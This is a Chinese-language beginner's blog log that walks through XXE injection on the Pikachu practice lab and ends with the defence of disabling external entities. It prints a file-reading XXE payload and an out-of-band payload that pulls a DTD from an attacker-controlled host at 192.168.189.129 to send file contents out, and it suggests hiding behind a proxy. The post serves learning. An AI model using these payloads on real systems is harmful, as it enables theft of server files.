网安学习日志4.9(XXE漏洞)

最新推荐文章于 2024-07-25 16:13:31 发布
最新推荐文章于 2024-07-25 16:13:31 发布
阅读量980 收藏 22
点赞数 31
文章标签: 网络安全 xml
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61035923/article/details/137536623
版权
本文介绍了XML的基础概念,包括XML声明、DTD中的预定义、自定义和参数实体,以及XXE漏洞的工作原理和利用方法。着重讲解了无回显环境下的XXE漏洞测试,并强调了禁用外部实体作为安全防御措施。
摘要由CSDN通过智能技术生成
警告

新手学习日志,如有出现错误请多多包涵╰(*°▽°*)╯

1.初步认识XML

想要对XXE漏洞进行了解,也就必须对XML有所了解,经过一段时间的学习,我们可以知道,一个合法且正常的xml主要包括三个部分:一个xml声明,文档类型定义和文档元素,如下图所示:

xml主要聚焦于数据,其内容可视为数据库内容的行和列的那种模式,如下图:

表相当于声明了一个类型为表,右边的字段定义相当于文档类型的定义,下面的数据相当于文档元素,这样进行对比就可以方便我们的理解 ;

然后就是在xml的DTD(文档类型定义)中经常看到的三个实体:

第一个是预定义实体,我的理解就是用一串字符来代替在xml中已经被定义过作用的某些符号;

第二个是自定义实体,也就是通过在DTD(文档类型定义)中通过一定的语法来使用自己定义的某些实体;

第三个是参数实体,也是在本文后面发挥重要作用的一个实体,它是只能在DTD中使用的实体,它的作用是能够调用外部的DTD文件,这个特性使得使用它变得更加的灵活,比如你新建一个xml依然想用到这个参数实体,你只需利用一小段代码进行引入就可以做到,不用像自定义实体一样重新从头一句句的写;

2.初识XXE漏洞 

XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。

下面我们通过pikachu上的靶场来重现这一漏洞。

首先安装好需要的靶场,准备进行漏洞重现。

在桌面上创建一个文本文档,输入内容如下:

 

随后准备一段脚本 ,如下:

<?xml version = "1.0"?> 
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///C://Users//ASUS//Desktop//kunkun.txt"> 
]> 
<foo>&xxe;</foo>

这段脚本的意思是读取我桌面上kunkun文件的内容写入自定义实体xxe中,然后进行输出。

我们把这段代码输入进去随后点击提交,结果如右图所示,我们成功读取了文本中的信息。

这是如何做到的呢?这是由于没有禁用外部实体的加载,从而导致黑客可以通过使用外部实体进行代码的运行从而读取你服务器上的文件。有人会问那我如何知道我想读取的文件的名字到底是什么呢,这就要用到信息收集相关的知识了,通过前期的信息收集,我们就可以对我们想要的目标进行定点攻击。 

这个脚本稍作修改也能进行内网探测,不过太过于鸡肋基本没人会用就不写了(❁´◡`❁)

3.进一步了解XXE漏洞

3.1 什么是无回显

在进行下一步之前,我们要先了解什么是“无回显”这个概念,通俗易懂的讲,就是无论你的代码执行成功或者是失败,都不给你进行反馈,让你无法判断自己到底有没有成功,我们在下文就要通过一定的手段来解决这个问题。

3.2 无回显XXE漏洞测试

首先我们对代码进行注释来创建一个无回显的环境,如下图:

然后我们启动我们的虚拟机作为攻击端,在虚拟机的phpstudy中写入一个脚本如下:

 这段代码的意思就是接受一个文件“FILE”,然后写入file.txt的文件中,然后关闭,下面我们来测试一下有没有作用:

 

我们可以看到已经成功执行了代码,在我的虚拟机(IP:192.168.189.129)中自动创建了一个file.txt接受了我的数据。,我们接下来进行下一步。

我们先再被攻击者,也就是本机上创建一个1.txt的文件,文件内容如下:

然后我们首先在虚拟机中创建一个名字叫kk.dtd的外部实体写入代码如下:

其中IP地址为getikun所在的虚拟机地址,第一行为你想要获取的1.TXT的被攻击者的文档地址。

然后编写攻击脚本如下:

<?xml version = "1.0"?>
<!DOCTYPE ANY[
<!ENTITY % dtd SYSTEM "http://192.168.189.129/kk.dtd">
%dtd;]>

其中地址为虚拟机也就是攻击者的地址(实战中可以通过代理进行IP隐藏,防止自身IP泄露)。

写入PIKACHU

 

 

我们可以发现输入完成后什么反馈都没有,此时就轮到我们之前编写的获取脚本发挥作用的时候了。我们查看虚拟机上获取到的file.txt,发现如下图所示:

 

发现了一串我们看不懂的代码,这是啥呢(ˉ﹃ˉ) 

其实这是一串base64的代码,我们在之前指定了用base64的值进行读取,如下图红圈所示:

我们随后对其进行解码:

 

发现被攻击者的文本信息已经泄露给了攻击者,漏洞复现成功。 

4.总结

这是一个复现还算比较简单的漏洞,就是过程比较复杂。对于这个漏洞的防御也是比较简单,只要禁止外部实体就可以了。这篇文章是本人第一篇学习日志,如果出现了哪些出错的地方,可以评论区留言,我看到就改(可能吧(❁´◡`❁))

夜雀食堂の大厨
关注
  • 31
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXEXML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
网络安全XXE漏洞复现及防御(上篇)(技术进阶)
weixin_70911257的博客
04-16 1384
xxe漏洞复现
XXE漏洞复现实操
wutiangui的博客
10-13 904
(1)XXE漏洞全称XML External Entity Injection,即xmI外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害,XML(也是一种语言)被设计用来传输和存储数据。(2)也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致漏洞。如果能够建立连接,那么服务器端的ncat会收到相应的请求信息。
XXE漏洞复现
最新发布
C233333235的博客
07-25 838
XML外部实体注入(XML Extenrnal Entity Injection),简称XXE漏洞。引发XXE漏洞的主要原因是XML解析依赖库libxml默认开启了对外部实体的引用,导致服务端在解析用户提交的XML信息时未作处理直接进行解析,导致加载恶意的外部文件和代码,造成任意文件读取,命令执行(利用条件苛刻)内网扫描等危害在本篇 文章中我们使用pikachu靶场实现XXE漏洞复现。
xxe漏洞浅谈以及复现
weixin_51692662的博客
10-18 1980
xxe
Web安全 XXE漏洞测试和利用.(读取服务器的任何文件 和 收集服务器的内网信息.)
网络安全领域___专研者.
03-08 6531
XXE漏洞全称(XML External Entity Injection),即XML外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成:文件读取、命令执行、内网端口扫描、攻击内网网站,DOS攻击 等危害.(xxe漏洞触发的点往往是可以上传xml文件的位置的,没有对上传的xml文件进行过滤,导致可上传恶意xml文件.)
XXE漏洞及复现
weixin_45643931的博客
08-20 798
XXE漏洞 全称XML External Entity Injection即XML外部实体注入漏洞 由名字可以知道 这是关于XML漏洞 SQL注入是在注入点处输入SQL恶意语法执行达到自己的目的 那么XXE应该也是类似的 在可以解析XML的地方(比如一个输入框等处)提交XML的恶意代码来执行 ⅩXE漏洞发生在应用序解析ⅩML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害 ...
XXE外部实体引入漏洞原理及复现
G3et的博客
02-26 750
XXE (XML 外部实体) 是一种安全漏洞,影响解析 XML 输入的应用程序。该漏洞允许攻击者在 XML 文档中注入外部实体, DTD 可以在 XML 文档中引用外部实体。如果 XML 解析器未正确验证外部实体的内容,攻击者可以利用 XXE 漏洞读取系统的机密数据,或者在恶意 DTD 文件中执行任意代码。当应用程序未能正确处理传入的 XML 数据或未限制可以处理的实体类型时,XXE 可能发生。因此,攻击者可以构造一个包含外部实体的恶意 XML 文档,该外部实体由脆弱的应用程序处理。
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXEXML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
5、XXE漏洞pdf资料
10-15
XXEXML External Entity)漏洞是针对XML解析器的安全漏洞,它发生在XML解析器处理包含外部实体引用的恶意XML输入时。XML(eXtensible Markup Language)是一种用于存储和传输数据的标记语言,它的主要特点是允许...
105-web漏洞挖掘之XXE漏洞1
08-03
XXE漏洞详解】 XXE,全称为XML External Entity Injection,是XML解析器在处理XML输入时因未能正确配置,允许加载外部实体而导致的安全漏洞。这类漏洞允许攻击者注入恶意的XML外部实体,进而获取敏感信息、执行...
XXE漏洞-黑白盒测试+无回显
xiaoheizi的博客
07-02 941
XML被设计是为了传输和存储数据,XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。test.dtd内容:
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
qq_45612828的博客
08-02 6777
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
XXE漏洞复现步骤
zxcvbnmasdflzl的博客
06-24 1002
另外,一般来说,服务器解析XML有两种方式,一种是一次性将整个XML加载进内存中,进行解析;如果我们递归地调用XML定义,一次性调用巨量的定义,那么服务器的内存就会被消耗完,造成了拒绝服务攻击。既然XML可以从外部读取DTD文件,那我们就自然地想到了如果将路径换成另一个文件的路径,那么服务器在解析这个XML的时候就会把那个文件的内容赋值给SYSTEM前面的根元素中,只要我们在XML中让前面的根元素的内容显示出来,不就可以读取那个文件的内容了。3.检查所使用的底层xml解析库,默认禁止外部实体的解析。
phpshe v1.7漏洞复现(Sql injection+XXE)
weixin_51681694的博客
04-30 688
PHPSHE v1.7 sql注入,XXE
web漏洞-xml外部实体注入(XXE)
rumil的博客
10-09 2219
XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题",也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。
Vulnhub--XXE漏洞复现
qq_62169455的博客
08-23 375
下载完后,选择OVF文件,打开方式选择VMware,存储位置看你自己,然后打开靶机需要我们去登录,这里是没有现成的信息可以让我们登录(Vulnhub的靶场就是比较贴近于实战的环境,这里登录进去就可以直接看到flag,所以它不会直接给我们登录信息),于是就需要通过其他一些渗透手段来获取登录信息。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值